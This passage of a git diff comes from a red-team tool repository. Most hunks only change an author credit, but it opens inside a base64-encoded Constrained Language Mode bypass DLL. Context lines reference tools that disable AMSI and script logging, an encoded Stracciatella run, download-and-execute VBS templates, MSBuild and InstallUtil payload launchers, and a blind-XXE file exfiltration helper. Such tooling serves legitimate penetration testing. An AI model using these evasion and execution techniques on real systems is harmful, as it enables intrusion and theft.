AACigPAAAK3gAAKCEAAAolFm8iAAAKJRlvIwAACigkAAAKDQlvHwAACglvFwAAChZvGAAACglvIAAACt4KCSwGCW8lAAAK3N4VEwRyUQEAcBEEKBsAAAooDwAACt4AFioAATQAAAAAawASfQATEQAAAQAAkQAsvQATEQAAAQIA6gAaBAEKAAAAAAAA0QA/EAEVEQAAAR4CKCYAAAoqQlNKQgEAAQAAAAAADAAAAHY0LjAuMzAzMTkAAAAABQBsAAAA0AIAACN+AAA8AwAACAQAACNTdHJpbmdzAAAAAEQHAACEAQAAI1VTAMgIAAAQAAAAI0dVSUQAAADYCAAAgAEAACNCbG9iAAAAAAAAAAIAAAFHFQIUCQAAAAD6ATMAFgAAAQAAAB0AAAACAAAAAwAAAAEAAAAmAAAADgAAAAEAAAABAAAAAQAAAAEAAAACAAAAAAChAgEAAAAAAAYAxgFcAwYAMwJcAwYA+gADAw8AfAMAAAYAIgHhAgYAqQHhAgYAigHhAgYAGgLhAgYA5gHhAgYA/wHhAgYAOQHhAgYADgE9AwYA7AA9AwYAbQHhAgYAVAFiAgYAtAO4AgYA8wK4AgoAbAAWAwYAoQC4AgYASwBRAgYAAQC4AgYAfgK4AgoA9gMWAwoAdQDEAgoAxQAWAwoA4gMWAwYA3QBRAgoAiwMWAwYAlQC4AgAAAAAHAAAAAAABAAEAAQAQAM8DzwNBAAEAAQAAAAAAgACRIC0AjAABAFAgAAAAAJYAyQOQAAEAuCEAAAAAhhj9AgYAAgAAAAEAhQIJAP0CAQARAP0CBgAZAP0CCgApAP0CEAAxAP0CEAA5AP0CEABBAP0CEABJAP0CEABRAP0CEABZAP0CEABhAP0CFQBpAP0CEABxAP0CEAB5AP0CEACZAKkAJgChAEAAKwChABkAMACpAHwCNACxAK0DOACxAIkCMACxAK0DQACRAGEARwCRAPIDTAC5AIQAUQCRAMEAVwDJAIQAUQCxAK0DXADRAFIARwCRANkAYgCRAJsDaACRAL8CBgCRALMABgDJALsDbgDJANkAYgDJAJsDaADRAFIAcwDpALkABgCBAP0CBgAuAAsAlQAuABMAngAuABsAvQAuACMAxgAuACsA3gAuADMA3gAuADsA3gAuAEMAxgAuAEsA5AAuAFMA3gAuAFsA3gAuAGMA/AAuAGsAJgEuAHMAMwEaAJQCAAEDAC0AAQAEgAAAAQAAAAAAAAAAAAAAAADPAwAABAAAAAAAAAAAAAAAegAQAAAAAAADAAAAAAAAAAAAAACDAMQCAAAAAAAAAEludDMyADxNb2R1bGU+AG1zY29ybGliAGdldF9NYW5hZ2VkVGhyZWFkSWQAR2V0Q3VycmVudFRocmVhZElkAGdldF9DdXJyZW50VGhyZWFkAENyZWF0ZVJ1bnNwYWNlAGdldF9EZWZhdWx0UnVuc3BhY2UAUFNMYW5ndWFnZU1vZGUAc2V0X0xhbmd1YWdlTW9kZQBJRGlzcG9zYWJsZQBDb25zb2xlAFdyaXRlTGluZQBDbG9zZQBEaXNwb3NlAGdldF9Jbml0aWFsU2Vzc2lvblN0YXRlAHNldF9BcGFydG1lbnRTdGF0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBTeXN0ZW0uVGhyZWFkaW5nAFN5c3RlbS5SdW50aW1lLlZlcnNpb25pbmcAVG9TdHJpbmcAYXJnAGdldF9MZW5ndGgAa2VybmVsMzIuZGxsAENsbURpc2FibGVBc3NlbWJseS5kbGwAU3lzdGVtAE9wZW4AU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBFeGNlcHRpb24ALmN0b3IAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYX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" diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp index 41f8d2a..f526e36 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp +++ b/red-teaming/Bypass-ConstrainedLanguageMode/ClmDisableDll/main.cpp @@ -2,7 +2,7 @@ * This DLL hosts CLR4 environment from within a native binary. This way it is possible to * call .NET APIs from an unmanaged runtime. * - * Mariusz B., mgeeky, 19' + * Mariusz Banach, mgeeky, 19' * **/ diff --git a/red-teaming/Bypass-ConstrainedLanguageMode/README.md b/red-teaming/Bypass-ConstrainedLanguageMode/README.md index 1dfcacf..534e3d6 100644 --- a/red-teaming/Bypass-ConstrainedLanguageMode/README.md +++ b/red-teaming/Bypass-ConstrainedLanguageMode/README.md @@ -26,7 +26,7 @@ PS > .\Bypass-CLM.ps1 (implementation of: @xpn's technique, as documented in:) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) - Re-implemented, enhanced by: Mariusz B., mgeeky + Re-implemented, enhanced by: Mariusz Banach, mgeeky ----- [.] Step 0. Planted DLL files in: diff --git a/red-teaming/C3-Client/README.md b/red-teaming/C3-Client/README.md index 9c22cac..7989e9b 100644 --- a/red-teaming/C3-Client/README.md +++ b/red-teaming/C3-Client/README.md @@ -22,7 +22,7 @@ The script offers subcommands-kind of CLI interface, so after every command one PS> py .\c3-client.py --help :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, usage: Usage: ./c3-client.py [options] [...] @@ -59,7 +59,7 @@ optional arguments: PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay --help :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, usage: Usage: ./c3-client.py [options] [...] alarm relay [-h] [-e EXECUTE] [-x WEBHOOK] [-g gateway_id] @@ -144,7 +144,7 @@ This example shows how to keep all of your Relays pinged every 45 seconds: PS D:\> py c3-client.py http://192.168.0.200:52935 ping -k 45 :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [.] Sending a ping every 45 seconds. [.] Pinged relay: matter4 from gateway gate4 @@ -170,7 +170,7 @@ Ever suffered from a poor C3 bandwidth or general performance? Worry not - you c PS D:\> py .\c3-client.py http://192.168.0.200:52935 channel all clear :: C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [.] LDAP: Clearing messages queue... [+] Cleared LDAP attribute value on C3 channel 3 on Relay matter4 on gateway gate4 @@ -213,7 +213,7 @@ In this example setup an alarm that triggers upon new Relay checking-in. Wheneve PS D:\> py c3-client.py http://192.168.0.200:52935 alarm relay -g gate4 --execute "powershell -file speak.ps1 -message \`"New C3 Relay Inbound: /, computer: \`"" :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [.] Entering infinite-loop awaiting for new Relays... [+] New Relay checked-in! @@ -325,6 +325,6 @@ py c3-client.py http://192.168.0.200:52935 ping -k 45 ## Author ``` -Mariusz B. / mgeeky, '21 +Mariusz Banach / mgeeky, '21 ``` diff --git a/red-teaming/C3-Client/c3-client.py b/red-teaming/C3-Client/c3-client.py index a41b119..48f50dd 100644 --- a/red-teaming/C3-Client/c3-client.py +++ b/red-teaming/C3-Client/c3-client.py @@ -2036,7 +2036,7 @@ def parseArgs(argv): def main(argv): print(''' :: F-Secure's C3 Client - a lightweight automated companion with C3 voyages - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, ''') parseArgs(argv) diff --git a/red-teaming/Count-PrivilegedGroupMembers.ps1 b/red-teaming/Count-PrivilegedGroupMembers.ps1 index d545020..fd37a6f 100644 --- a/red-teaming/Count-PrivilegedGroupMembers.ps1 +++ b/red-teaming/Count-PrivilegedGroupMembers.ps1 @@ -8,7 +8,7 @@ PS> . .\Count-PrivilegedGroupMembers.ps1 PS> Count-PrivilegedGroupMembers - Mariusz B. / mgeeky + Mariusz Banach / mgeeky #> # This script requires PowerView 3.0 dev branch diff --git a/red-teaming/Disable-Amsi.ps1 b/red-teaming/Disable-Amsi.ps1 index bfbe365..79cb66c 100644 --- a/red-teaming/Disable-Amsi.ps1 +++ b/red-teaming/Disable-Amsi.ps1 @@ -5,7 +5,7 @@ Attempts to disable AMSI within current process using well-known techniques laid out in an unsignatured way. -Author: Mariusz B. (@mgeeky) +Author: Mariusz Banach (@mgeeky) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None diff --git a/red-teaming/Disable-ScriptLogging.ps1 b/red-teaming/Disable-ScriptLogging.ps1 index 6b6fed9..983362d 100644 --- a/red-teaming/Disable-ScriptLogging.ps1 +++ b/red-teaming/Disable-ScriptLogging.ps1 @@ -5,7 +5,7 @@ Attempts to disable Script Block logging within current process using well-known techniques laid out in an unsignatured way. -Author: Mariusz B. (@mgeeky) +Author: Mariusz Banach (@mgeeky) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None diff --git a/red-teaming/Export-ReconData.ps1 b/red-teaming/Export-ReconData.ps1 index b2790ac..e8c1873 100644 --- a/red-teaming/Export-ReconData.ps1 +++ b/red-teaming/Export-ReconData.ps1 @@ -5,7 +5,7 @@ files for later processing. This script is compatible with newest PowerView's version, from dev branch (as of 2018) that uses Get-Domain*, Find-* (instead of Invoke-*) and others cmdlets. - Author: Mariusz B. (mgeeky), '18 + Author: Mariusz Banach (mgeeky), '18 License: BSD 3-Clause Required Dependencies: PowerSploit's Recon.psm1 #> diff --git a/red-teaming/Get-DomainOUTree.ps1 b/red-teaming/Get-DomainOUTree.ps1 index d77cb72..95c86de 100644 --- a/red-teaming/Get-DomainOUTree.ps1 +++ b/red-teaming/Get-DomainOUTree.ps1 @@ -1,7 +1,7 @@ #requires -version 2 <# - Author: Mariusz B. (@mgeeky) + Author: Mariusz Banach (@mgeeky) License: BSD 3-Clause Required Dependencies: PowerView.ps1 Optional Dependencies: None @@ -12,7 +12,7 @@ function Get-DomainOUTree <# .SYNOPSIS - Author: Mariusz B. (@mgeeky) + Author: Mariusz Banach (@mgeeky) License: BSD 3-Clause Required Dependencies: PowerView.ps1 Optional Dependencies: None @@ -65,7 +65,7 @@ function Get-NetOUTree <# .SYNOPSIS - Author: Mariusz B. (@mgeeky) + Author: Mariusz Banach (@mgeeky) License: BSD 3-Clause Required Dependencies: PowerView.ps1 Optional Dependencies: None diff --git a/red-teaming/Get-UserPasswordEntries.ps1 b/red-teaming/Get-UserPasswordEntries.ps1 index e7febaf..0eaa655 100644 --- a/red-teaming/Get-UserPasswordEntries.ps1 +++ b/red-teaming/Get-UserPasswordEntries.ps1 @@ -8,7 +8,7 @@ PS> . .\Get-UserPasswordEntries.ps1 PS> Get-UserPasswordEntries - Mariusz B. / mgeeky + Mariusz Banach / mgeeky #> # This script requires PowerView 3.0 dev branch diff --git a/red-teaming/README.md b/red-teaming/README.md index 1a8e1b1..961b5a0 100755 --- a/red-teaming/README.md +++ b/red-teaming/README.md @@ -15,7 +15,7 @@ PS > .\Bypass-CLM.ps1 (implementation of: @xpn's technique, as documented in:) (https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/) - Re-implemented, enhanced by: Mariusz B., mgeeky + Re-implemented, enhanced by: Mariusz Banach, mgeeky ----- [.] Step 0. Planted DLL files in: @@ -180,7 +180,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox :: Powershell via MSBuild inline-task XML payload generation script To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [?] File not recognized as PE/EXE. @@ -189,7 +189,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox - + @@ -237,7 +237,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 :: Powershell via MSBuild inline-task XML payload generation script To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [?] File not recognized as PE/EXE. @@ -363,7 +363,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200) PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1 :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. - Mariusz B. / mgeeky, '19 + Mariusz Banach / mgeeky, '19 [.] Will load script file: '.\Test2.ps1' [+] AMSI Disabled. @@ -395,7 +395,7 @@ This script contains malicious content and has been blocked by your antivirus so PS D:\> .\Stracciatella.exe -v :: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled. - Mariusz B. / mgeeky, '19 + Mariusz Banach / mgeeky, '19 [-] It looks like no script path was given. [+] AMSI Disabled. diff --git a/red-teaming/Save-ReconData.ps1 b/red-teaming/Save-ReconData.ps1 index 3047848..9691c6d 100644 --- a/red-teaming/Save-ReconData.ps1 +++ b/red-teaming/Save-ReconData.ps1 @@ -5,7 +5,7 @@ This script launches many PowerView cmdlets and stores their output in Clixml files for later processing. - Author: Mariusz B. (mgeeky), '18 + Author: Mariusz Banach (mgeeky), '18 License: BSD 3-Clause Required Dependencies: PowerSploit's Recon.psm1 #> diff --git a/red-teaming/code-exec-templates/download-file-and-exec.vbs b/red-teaming/code-exec-templates/download-file-and-exec.vbs index 3f9ae67..c42bfa0 100644 --- a/red-teaming/code-exec-templates/download-file-and-exec.vbs +++ b/red-teaming/code-exec-templates/download-file-and-exec.vbs @@ -2,7 +2,7 @@ ' Example of downloading a binary file from the URL, saving it to the ' local filesystem and then launching. ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs index e333bd7..2b3cfe5 100644 --- a/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs +++ b/red-teaming/code-exec-templates/download-powershell-and-exec-via-stdin.vbs @@ -2,7 +2,7 @@ ' Example of downloading a binary file from the URL, saving it to the ' local filesystem and then launching. ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs index 9abe02a..a8f8c46 100644 --- a/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs +++ b/red-teaming/code-exec-templates/drop-binary-file-and-launch.vbs @@ -2,7 +2,7 @@ ' Example of dropping an embedded, base64 encoded binary file to the disk, ' decoding it and then launching. ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/code-exec-templates/wmi-exec-command.vbs b/red-teaming/code-exec-templates/wmi-exec-command.vbs index ff57376..5c8ea9e 100644 --- a/red-teaming/code-exec-templates/wmi-exec-command.vbs +++ b/red-teaming/code-exec-templates/wmi-exec-command.vbs @@ -2,7 +2,7 @@ ' This script uses WMI class' Win32_Process static method Create to ' execute given command in a hidden window (ShowWindow = 12). ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs index 870257e..593c036 100644 --- a/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs +++ b/red-teaming/code-exec-templates/wscript-shell-code-exec.vbs @@ -2,7 +2,7 @@ ' This script uses classic WScript.Shell Run method to ' execute given command in a hidden window (second param = 0) ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs index 8264bcb..54686b2 100644 --- a/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs +++ b/red-teaming/code-exec-templates/wscript-shell-stdin-code-exec.vbs @@ -3,7 +3,7 @@ ' execute given command in a hidden window via StdIn passed to a dedicated ' launcher command (powershell.exe in this example). ' -' Mariusz B. / mgeeky, +' Mariusz Banach / mgeeky, ' (https://github.com/mgeeky) ' diff --git a/red-teaming/generateMSBuildXML.py b/red-teaming/generateMSBuildXML.py index 2437e25..a04539b 100644 --- a/red-teaming/generateMSBuildXML.py +++ b/red-teaming/generateMSBuildXML.py @@ -12,7 +12,7 @@ # - raw Shellcode in a separate thread via CreateThread # - .NET Assembly via Assembly.Load # -# Mariusz B. / mgeeky, +# Mariusz Banach / mgeeky, # import re @@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess): - + <$templateName /> @@ -584,7 +584,7 @@ def main(argv): sys.stderr.write(''' :: Powershell via MSBuild inline-task XML payload generation script To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe' - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, ''') if len(argv) < 2: diff --git a/red-teaming/markOwnedNodesInNeo4j.py b/red-teaming/markOwnedNodesInNeo4j.py index c84a5d2..cdeddd0 100644 --- a/red-teaming/markOwnedNodesInNeo4j.py +++ b/red-teaming/markOwnedNodesInNeo4j.py @@ -7,7 +7,7 @@ # script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your # future use of BloodHound. # -# Mariusz B. / mgeeky +# Mariusz Banach / mgeeky # import sys diff --git a/red-teaming/msbuild-powershell-msgbox.xml b/red-teaming/msbuild-powershell-msgbox.xml index 21da20d..a7cd377 100644 --- a/red-teaming/msbuild-powershell-msgbox.xml +++ b/red-teaming/msbuild-powershell-msgbox.xml @@ -3,7 +3,7 @@ - + diff --git a/red-teaming/rogue-dot-net/README.md b/red-teaming/rogue-dot-net/README.md index 02ce5b5..734a25a 100644 --- a/red-teaming/rogue-dot-net/README.md +++ b/red-teaming/rogue-dot-net/README.md @@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help :: Rogue .NET Source Code Generation Utility To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, usage: .\generateRogueDotNet.py [options] @@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs :: Rogue .NET Source Code Generation Utility To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil. - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, [?] File specified as raw Shellcode. diff --git a/red-teaming/rogue-dot-net/generateRogueDotNet.py b/red-teaming/rogue-dot-net/generateRogueDotNet.py index c7cc405..5d8bdcb 100644 --- a/red-teaming/rogue-dot-net/generateRogueDotNet.py +++ b/red-teaming/rogue-dot-net/generateRogueDotNet.py @@ -34,7 +34,7 @@ # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll # -# Mariusz B. / mgeeky, +# Mariusz Banach / mgeeky, # import re @@ -519,7 +519,7 @@ def getSourceFileContents( /* Author: Casey Smith, Twitter: @subTee - Customized by: Mariusz B. / mgeeky, + Customized by: Mariusz Banach / mgeeky, License: BSD 3-Clause Step 1: Create Your Strong Name Key -> key.snk @@ -806,7 +806,7 @@ def main(argv): sys.stderr.write(''' :: Rogue .NET Source Code Generation Utility Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler - Mariusz B. / mgeeky, + Mariusz Banach / mgeeky, ''') if len(argv) < 2: diff --git a/web/blindxxe.py b/web/blindxxe.py index a8d03b8..492ef8b 100644 --- a/web/blindxxe.py +++ b/web/blindxxe.py @@ -31,7 +31,7 @@ # mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false # # -# Mariusz B., 2016 +# Mariusz Banach, 2016 # @@ -132,7 +132,7 @@ def parseOptions(argv): print(''' :: Blind-XXE attacker's helper backend component Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities. - Mariusz B. / mgeeky '16-18, + Mariusz Banach / mgeeky '16-18, ''') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] ') diff --git a/web/padding-oracle-tests.py b/web/padding-oracle-tests.py index 4f0c806..d279d9f 100644 --- a/web/padding-oracle-tests.py +++ b/web/padding-oracle-tests.py @@ -1,7 +1,7 @@ #!/usr/bin/python # # Padding Oracle test-cases generator. -# Mariusz B. / mgeeky, 2016 +# Mariusz Banach / mgeeky, 2016 # v0.2 # # Simple utility that aids the penetration tester when manually testing Padding Oracle condition @@ -277,7 +277,7 @@ def hex_dump(data): def main(): info('\n\tPadding Oracle test-cases generator') - info('\tMariusz B. / mgeeky, 2016\n') + info('\tMariusz Banach / mgeeky, 2016\n') if len(sys.argv) < 2: warning('usage: padding-oracle-tests.py [blocksize]') diff --git a/web/post.php b/web/post.php index 5e73e6b..dd4ac93 100644 --- 